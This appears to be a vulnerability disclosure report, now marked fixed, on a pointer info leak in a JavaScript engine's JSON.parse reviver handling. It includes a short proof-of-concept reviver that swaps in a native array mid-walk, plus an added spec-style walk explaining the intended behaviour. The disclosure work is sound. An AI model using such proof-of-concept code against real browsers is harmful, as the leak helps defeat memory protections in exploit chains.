There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.
A minimal PoC is as follows:
var once = false;
var a = 1;
// Reviver: on the first call, replace element 2 of the holder (this) with a
// fresh native array while the Walk is still in progress.
function f(){
    if(!once){
        a = new Array(1, 2, 3);
        this[2] = a;
    }
    once = true;
    return {};
}
// Walk reaches index 2, finds the swapped-in native array, and treats it as a Var array.
JSON.parse("[1, 2, [4, 5]]", f);
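For context on what the reviver walk is supposed to do, here is an added illustration (not from the original report, and not Chakra's code): a spec-style walk in plain JavaScript modelled on ECMAScript's InternalizeJSONProperty. The function names internalize, parseWithReviver and swapVisitOrder are mine. It shows that a conforming walk re-reads each element from the holder after the reviver has run and dispatches on whatever type is now there, so when a reviver swaps in a new array mid-walk (as the PoC above does) the walk descends into the replacement array rather than the original one. The bug in the report is the engine keeping its assumption about the original element kind while doing exactly this re-read.

```javascript
// Added example, not part of the original report. Spec-style reviver walk
// modelled on ECMAScript InternalizeJSONProperty(holder, name, reviver).
// `log` collects the keys visited, in order.
function internalize(holder, key, reviver, log) {
  // Always re-read from the holder: an earlier reviver call may have replaced it.
  const val = holder[key];
  if (val !== null && typeof val === 'object') {
    if (Array.isArray(val)) {
      const len = val.length;                 // length is read once, per spec
      for (let i = 0; i < len; i++) {
        const newElement = internalize(val, String(i), reviver, log);
        if (newElement === undefined) delete val[i];
        else val[i] = newElement;
      }
    } else {
      for (const k of Object.keys(val)) {
        const newElement = internalize(val, k, reviver, log);
        if (newElement === undefined) delete val[k];
        else val[k] = newElement;
      }
    }
  }
  log.push(key);
  // The holder becomes `this` inside the reviver, which is what lets a
  // reviver mutate siblings that have not been walked yet.
  return reviver.call(holder, key, val);
}

function parseWithReviver(text, reviver, log = []) {
  const root = { '': JSON.parse(text) };     // wrapper holder with the empty key
  return internalize(root, '', reviver, log);
}

// Replays the report's PoC reviver against the spec-style walk and returns the
// sequence of (key:value) pairs the reviver observed. Input is the PoC's own
// constructed JSON text "[1, 2, [4, 5]]".
function swapVisitOrder() {
  const seen = [];
  let once = false;
  const reviver = function (key, value) {
    const shown = Array.isArray(value) ? 'array'
      : (value !== null && typeof value === 'object') ? 'object' : String(value);
    seen.push(key + ':' + shown);
    if (!once) {
      once = true;
      this[2] = [1, 2, 3];                     // swap in a new array mid-walk
    }
    return {};
  };
  parseWithReviver('[1, 2, [4, 5]]', reviver);
  return seen;
}

console.log(swapVisitOrder());
```

The visit order shows the walk descending into the three elements of the swapped-in array and never visiting the original [4, 5]: the element at index 2 is re-fetched and handled by its current type. An engine that instead remembers the element kind it saw at parse time, as the report describes, would write values of the wrong representation into that array.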
A full PoC is attached. When loaded in a browser, this PoC will display pointers in an alert dialog.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Status: Fixed